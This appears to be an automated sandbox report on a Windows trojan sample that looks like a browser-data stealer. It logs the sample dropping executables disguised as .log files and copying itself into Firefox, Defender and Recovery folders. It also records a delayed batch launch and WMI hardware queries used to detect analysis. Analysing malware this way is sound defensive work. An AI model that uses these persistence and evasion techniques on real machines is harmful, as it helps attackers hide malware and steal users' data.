                            Source: ICMDMDoc.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: zTtncajv.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: yOiNcrtu.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: iMcIJnEg.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: XYySZcJy.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: FMWMFGoj.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: vdCwVejC.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: eWmRCrDn.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: cLPQBZYm.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                            Source: Cbqwysdq.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: 85D5ktqjpd.exe, 00000000.00000002.1738426023.000000000391F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs 85D5ktqjpd.exe
Source: 85D5ktqjpd.exe, 00000000.00000002.1755774464.000000001C36B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs 85D5ktqjpd.exe
Source: 85D5ktqjpd.exe, 00000000.00000002.1755774464.000000001C36B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs 85D5ktqjpd.exe
Source: 85D5ktqjpd.exe, 00000000.00000002.1738426023.0000000003820000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs 85D5ktqjpd.exe
Source: 85D5ktqjpd.exe, 00000000.00000002.1738285943.00000000032F0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameBrowsersStealer_native.dll" vs 85D5ktqjpd.exe
Source: 85D5ktqjpd.exe, 00000000.00000002.1755424635.000000001C242000.00000002.00000001.01000000.00000000.sdmp | Binary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs 85D5ktqjpd.exe
Source: 85D5ktqjpd.exe, 00000000.00000002.1738426023.0000000003909000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs 85D5ktqjpd.exe
Source: 85D5ktqjpd.exe | Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs 85D5ktqjpd.exe
Source: 85D5ktqjpd.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.evad.winEXE@10/73@0/1
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | File created: C:\Program Files\Mozilla Firefox\uninstall\upfc.exe
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | File created: C:\Users\user\Desktop\rIogOAZx.log
Source: C:\Recovery\ctfmon.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_03
Source: C:\Recovery\ctfmon.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\6221a3ce11ad15d7fc6881b7016cb4cb64da46691841946f781729876ccb1b99
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | File created: C:\Users\user\AppData\Local\Temp\UorNf9LNUt
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KgQDHOJvgq.bat"
Source: 85D5ktqjpd.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 85D5ktqjpd.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Recovery\ctfmon.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 85D5ktqjpd.exe | Virustotal: Detection: 62%
Source: 85D5ktqjpd.exe | ReversingLabs: Detection: 83%
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | File read: C:\Users\user\Desktop\85D5ktqjpd.exe
Source: unknown | Process created: C:\Users\user\Desktop\85D5ktqjpd.exe "C:\Users\user\Desktop\85D5ktqjpd.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe | Process created: C:\Recovery\ctfmon.exe "C:\Recovery\ctfmon.exe"
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, sspicli.dll, ktmw32.dll, amsi.dll, userenv.dll, ntmarta.dll, uxtheme.dll, propsys.dll, dlnashext.dll, wpdshext.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll, apphelp.dll
Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll, fsutilext.dll
Source: C:\Windows\System32\PING.EXE | Section loaded: iphlpapi.dll, mswsock.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, winnsi.dll
Source: C:\Recovery\ctfmon.exe | Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, sspicli.dll, ktmw32.dll, amsi.dll, userenv.dll, wbemcomn.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, textshaping.dll, uxtheme.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Recovery\ctfmon.exe | Automated click: OK (repeated 21 times)
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Directory created: C:\Program Files\Mozilla Firefox\uninstall\upfc.exe
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Directory created: C:\Program Files\Mozilla Firefox\uninstall\ea1d8f6d871115
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Directory created: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Directory created: C:\Program Files\Uninstall Information\72f9cbbcf2062a
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Directory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\24dbde2999530e
Source: 85D5ktqjpd.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 85D5ktqjpd.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
Source: 85D5ktqjpd.exe | Static file information: File size 4515328 > 1048576
Source: 85D5ktqjpd.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x3b7e00
Source: 85D5ktqjpd.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbI source: ctfmon.exe, 00000005.00000002.2972545766.000000001B860000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbpdbtem.pdb source: ctfmon.exe, 00000005.00000002.2974289113.000000001BE88000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: ctfmon.exe, 00000005.00000002.2975498327.000000001BF7A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: ctfmon.exe, 00000005.00000002.2975498327.000000001BF7A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: ctfmon.exe, 00000005.00000002.2972545766.000000001B860000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Recovery\ctfmon.PDB^ source: ctfmon.exe, 00000005.00000002.2972545766.000000001B8BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: ctfmon.exe, 00000005.00000002.2975498327.000000001BF7A000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Code function: 0_2_00007FFD9B8B4C62 push edx; retf 0_2_00007FFD9B8B4C6F
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Code function: 0_2_00007FFD9B8B00BD pushad ; iretd 0_2_00007FFD9B8B00C1
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Code function: 0_2_00007FFD9BA729ED pushad ; iretd 0_2_00007FFD9BA72A01
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Code function: 0_2_00007FFD9BA77967 push ebx; retf 0_2_00007FFD9BA7796A
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Code function: 0_2_00007FFD9BFB7C5F push eax; retf 0_2_00007FFD9BFB7C6D
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Code function: 0_2_00007FFD9BFB88FF push FFFFFFE8h; retf 0_2_00007FFD9BFB89F1
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Code function: 0_2_00007FFD9BFB7567 push ebx; iretd 0_2_00007FFD9BFB756A
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Code function: 0_2_00007FFD9BFB896C push FFFFFFE8h; retf 0_2_00007FFD9BFB89F1
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Code function: 0_2_00007FFD9BFB8164 push ebx; ret 0_2_00007FFD9BFB816A
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Code function: 0_2_00007FFD9BFB8970 push FFFFFFE8h; retf 0_2_00007FFD9BFB89F1
Source: C:\Users\user\Desktop\85D5ktqjpd.exe | Code function: 0_2_00007FFD9BFB7C2F pushad ; retf 0_2_00007FFD9BFB7C5D
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9BAD4C62 push edx; retf 5_2_00007FFD9BAD4C6F
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9BAD00BD pushad ; iretd 5_2_00007FFD9BAD00C1
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9BAF24DB push eax; iretd 5_2_00007FFD9BAF24DC
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9BAF24D4 push eax; iretd 5_2_00007FFD9BAF24D5
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9BC933A5 pushad ; iretd 5_2_00007FFD9BC933B9
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9C1D7C5F push eax; retf 5_2_00007FFD9C1D7C6D
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9C1D88FF push FFFFFFE8h; retf 5_2_00007FFD9C1D89F1
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9C1D896C push FFFFFFE8h; retf 5_2_00007FFD9C1D89F1
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9C1D7567 push ebx; iretd 5_2_00007FFD9C1D756A
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9C1D8164 push ebx; ret 5_2_00007FFD9C1D816A
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9C1D8970 push FFFFFFE8h; retf 5_2_00007FFD9C1D89F1
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9C1D7C2F pushad ; retf 5_2_00007FFD9C1D7C5D
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9C417672 push ecx; iretd 5_2_00007FFD9C417673
Source: C:\Recovery\ctfmon.exe | Code function: 5_2_00007FFD9C419355 push edx; ret 5_2_00007FFD9C41935B

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\85D5ktqjpd.exe File written: C:\Program Files\Mozilla Firefox\uninstall\upfc.exe
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\oPZxcDoy.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\XYySZcJy.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\NLuKuVnw.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\HFlvrDZi.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Program Files\Uninstall Information\XWWZQvSvBozA.exe
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\Cbqwysdq.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\vdCwVejC.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\rIogOAZx.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\CpWmZfmQ.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\ZJdigpUr.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\cLPQBZYm.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\yOiNcrtu.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\eWmRCrDn.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\VOtkXUXl.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\LnsTTQzV.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\WLUssUmg.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\jAgQuBAe.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\AppData\Local\Microsoft\XWWZQvSvBozA.exe
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\RYCtQXXs.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\ZRNAKZux.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\yWRfHaUA.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\haIyjaMG.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Program Files\Mozilla Firefox\uninstall\upfc.exe
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\iMcIJnEg.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\LEzlimtY.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\tTxOTVxp.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\fKqanEzl.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\dzUZnmUk.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\lQyoqXNz.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\akEQlvtX.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\QitkawpP.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\WbWKDcuD.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\hyuiZSvj.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\TEXjXBsl.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\pHpfyUNt.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\jswyQSZZ.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\xJoFaSxi.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\WuNaeyse.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Recovery\ctfmon.exe
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\ICMDMDoc.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\cExRVzrV.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\JVDTnZnD.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\oYwxMpHv.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\ypIvhwSa.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\HpjdguSK.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\VWLjDtED.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\psJpXhFT.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\FfNcgcmK.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\kiFHFtHC.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\CJjejXjo.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\sdoGeuPL.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\zTtncajv.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\MdBcJrhy.log
Source: C:\Recovery\ctfmon.exe File created: C:\Users\user\Desktop\FMWMFGoj.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\nbVprpsA.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\EzsmZyRR.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\gdhqOayL.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe File created: C:\Users\user\Desktop\uzSEaASh.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Recovery\ctfmon.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Recovery\ctfmon.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Users\user\Desktop\85D5ktqjpd.exe Memory allocated: 1950000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\85D5ktqjpd.exe Memory allocated: 1B430000 memory reserve | memory write watch
Source: C:\Recovery\ctfmon.exe Memory allocated: 15E0000 memory reserve | memory write watch
Source: C:\Recovery\ctfmon.exe Memory allocated: 1AF90000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\85D5ktqjpd.exe Code function: 0_2_00007FFD9BA63558 rdtsc 0_2_00007FFD9BA63558
Source: C:\Users\user\Desktop\85D5ktqjpd.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\85D5ktqjpd.exe Dropped PE file which has not been started: C:\Users\user\Desktop\oPZxcDoy.log
Source: C:\Recovery\ctfmon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\XYySZcJy.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe Dropped PE file which has not been started: C:\Users\user\Desktop\NLuKuVnw.log
Source: C:\Recovery\ctfmon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\HFlvrDZi.log
Source: C:\Recovery\ctfmon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\Cbqwysdq.log
Source: C:\Recovery\ctfmon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\vdCwVejC.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe Dropped PE file which has not been started: C:\Users\user\Desktop\rIogOAZx.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CpWmZfmQ.log
Source: C:\Recovery\ctfmon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ZJdigpUr.log
Source: C:\Recovery\ctfmon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\cLPQBZYm.log
Source: C:\Recovery\ctfmon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\eWmRCrDn.log
Source: C:\Recovery\ctfmon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\yOiNcrtu.log
Source: C:\Recovery\ctfmon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\LnsTTQzV.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe Dropped PE file which has not been started: C:\Users\user\Desktop\VOtkXUXl.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe Dropped PE file which has not been started: C:\Users\user\Desktop\WLUssUmg.log
Source: C:\Recovery\ctfmon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\jAgQuBAe.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe Dropped PE file which has not been started: C:\Users\user\Desktop\RYCtQXXs.log
Source: C:\Recovery\ctfmon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\ZRNAKZux.log
Source: C:\Recovery\ctfmon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\yWRfHaUA.log
Source: C:\Users\user\Desktop\85D5ktqjpd.exe Dropped PE file which has not been started: C:\Users\user\Desktop\haIyjaMG.log
Source: C:\Recovery\ctfmon.exe Dropped PE file which has not been started: C:\Users\user\Desktop\LEzlimtY.log
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\iMcIJnEg.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\tTxOTVxp.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\fKqanEzl.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\dzUZnmUk.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\akEQlvtX.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\lQyoqXNz.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\QitkawpP.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\WbWKDcuD.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\hyuiZSvj.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\TEXjXBsl.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\pHpfyUNt.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\jswyQSZZ.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\xJoFaSxi.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\WuNaeyse.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\ICMDMDoc.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\cExRVzrV.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\JVDTnZnD.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\oYwxMpHv.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\ypIvhwSa.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\HpjdguSK.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\VWLjDtED.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\psJpXhFT.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\FfNcgcmK.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\kiFHFtHC.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\CJjejXjo.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\sdoGeuPL.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\zTtncajv.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\MdBcJrhy.logJump to dropped file
                            Source: C:\Recovery\ctfmon.exeDropped PE file which has not been started: C:\Users\user\Desktop\FMWMFGoj.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\nbVprpsA.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\EzsmZyRR.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\gdhqOayL.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exeDropped PE file which has not been started: C:\Users\user\Desktop\uzSEaASh.logJump to dropped file
                            Source: C:\Users\user\Desktop\85D5ktqjpd.exe TID: 7028Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Recovery\ctfmon.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                            Source: C:\Recovery\ctfmon.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                            Source: C:\Recovery\ctfmon.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                            Source: C:\Recovery\ctfmon.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
